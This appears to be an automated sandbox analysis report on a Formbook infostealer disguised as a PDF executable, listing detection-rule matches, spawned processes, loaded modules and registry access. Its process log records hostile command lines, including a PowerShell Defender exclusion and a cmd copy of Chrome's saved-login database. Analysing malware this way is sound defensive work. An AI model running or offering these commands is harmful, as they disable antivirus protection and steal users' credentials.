Source: Process Memory Space: Specification and Quantity Pdf.exe PID: 7692, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7924, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wmplayer.exe PID: 7956, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 8156, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/11@12/2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_00E93C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

10_2_00E93C66

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

Code function: 0_2_00007FF773C61830 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,

0_2_00007FF773C61830

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_00E9205A CoCreateInstance,

10_2_00E9205A

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

File created: C:\Users\user\Specification and Quantity Pdf.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5ourtqv.q22.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: WLDP.DLL		10_2_00E94136
Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: localserver		10_2_00E94136

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

Source: rundll32.exe, 0000000A.00000003.1403521076.000000000086C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3749703001.000000000086C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.1399455599.00000000033BA000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1399718470.0000000003395000.00000004.00001000.00020000.00000000.sdmp, DB1.12.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Specification and Quantity Pdf.exe	Virustotal: Detection: 68%
Source: Specification and Quantity Pdf.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

File read: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Specification and Quantity Pdf.exe "C:\Users\user\Desktop\Specification and Quantity Pdf.exe"
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File written: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogri.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Specification and Quantity Pdf.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Specification and Quantity Pdf.exe

Static file information: File size 1678432 > 1048576

Source: Specification and Quantity Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Specification and Quantity Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Specification and Quantity Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Specification and Quantity Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Specification and Quantity Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Specification and Quantity Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Specification and Quantity Pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Specification and Quantity Pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: firefox.pdbP source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000003.1308686773.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.1311421220.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.0000000004470000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1377466502.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.000000000460E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1379009493.00000000042C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000003.1308686773.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.1311421220.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.3751897007.0000000004470000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1377466502.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.000000000460E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1379009493.00000000042C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: wmplayer.exe, 00000006.00000002.1377678931.00000000037D0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377431064.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.3751441685.0000000000E90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: wmplayer.exe, 00000006.00000002.1377678931.00000000037D0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377431064.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751441685.0000000000E90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wmplayer.pdbGCTL source: rundll32.exe, 0000000A.00000002.3749703001.00000000007E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wmplayer.pdb source: rundll32.exe, 0000000A.00000002.3749703001.00000000007E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp

Source: Specification and Quantity Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Specification and Quantity Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Specification and Quantity Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Specification and Quantity Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Specification and Quantity Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: Specification and Quantity Pdf.exe	Static PE information: section name: .managed
Source: Specification and Quantity Pdf.exe	Static PE information: section name: hydrated
Source: Specification and Quantity Pdf.exe.0.dr	Static PE information: section name: .managed
Source: Specification and Quantity Pdf.exe.0.dr	Static PE information: section name: hydrated

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00416822 push 943AA45Fh; iretd	6_2_00416929
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00417095 push ecx; retf	6_2_00417096
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_004170AB push edi; ret	6_2_004170C1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041690C push 943AA45Fh; iretd	6_2_00416929
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041F12D push cs; ret	6_2_0041F13C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041EA08 push eax; ret	6_2_0041EA09
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041D4E2 push eax; ret	6_2_0041D4E8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041D4EB push eax; ret	6_2_0041D552
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041D495 push eax; ret	6_2_0041D4E8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041D54C push eax; ret	6_2_0041D552
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00416503 push cs; iretd	6_2_00416504
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_004165F4 push edi; retf	6_2_004165FB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041E5A0 push dword ptr [9047960Ah]; ret	6_2_0041E5C2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_004175A6 push ebp; ret	6_2_004175A7
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00416647 push ecx; retf	6_2_00416653
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038309AD push ecx; mov dword ptr [esp], ecx	6_2_038309B6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B5EB1E push esp; retn 0000h	6_2_03B5EB1F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B5EB02 push esp; retn 0000h	6_2_03B5EB03
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B5E9B5 push esp; retn 0000h	6_2_03B5EAE7
Source: C:\Windows\explorer.exe	Code function: 8_2_0E797B1E push esp; retn 0000h	8_2_0E797B1F
Source: C:\Windows\explorer.exe	Code function: 8_2_0E797B02 push esp; retn 0000h	8_2_0E797B03
Source: C:\Windows\explorer.exe	Code function: 8_2_0E7979B5 push esp; retn 0000h	8_2_0E797AE7
Source: C:\Windows\explorer.exe	Code function: 8_2_10A4A9B5 push esp; retn 0000h	8_2_10A4AAE7
Source: C:\Windows\explorer.exe	Code function: 8_2_10A4AB02 push esp; retn 0000h	8_2_10A4AB03
Source: C:\Windows\explorer.exe	Code function: 8_2_10A4AB1E push esp; retn 0000h	8_2_10A4AB1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00E96883 push ecx; ret	10_2_00E96896
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00E9682D push ecx; ret	10_2_00E96840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044A09AD push ecx; mov dword ptr [esp], ecx	10_2_044A09B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003570AB push edi; ret	10_2_003570C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00357095 push ecx; retf	10_2_00357096
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035F12D push cs; ret	10_2_0035F13C

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

File created: C:\Users\user\Specification and Quantity Pdf.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

File created: C:\Users\user\Specification and Quantity Pdf.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

File created: C:\Users\user\Specification and Quantity Pdf.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (102).png

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
